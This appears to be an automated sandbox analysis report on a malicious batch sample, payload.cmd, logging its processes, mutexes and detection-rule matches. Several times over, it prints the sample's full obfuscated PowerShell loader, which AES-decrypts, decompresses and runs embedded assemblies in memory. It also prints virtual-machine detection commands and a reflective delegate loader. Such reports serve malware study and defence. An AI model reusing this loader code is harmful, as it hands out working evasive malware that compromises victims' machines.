Source: unknown	Process created: Commandline size = 5417
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2684	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5760, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spyw.evad.winCMD@54/88@2/2

Source: C:\Windows\System32\dllhost.exe

Code function: 41_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,

41_2_0000000140002D4C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 38_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

38_2_004011AD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 38_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,

38_2_004017A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\6273870
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\2851471
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\364263
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1riomnp1.nuz.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 2424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 2388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq 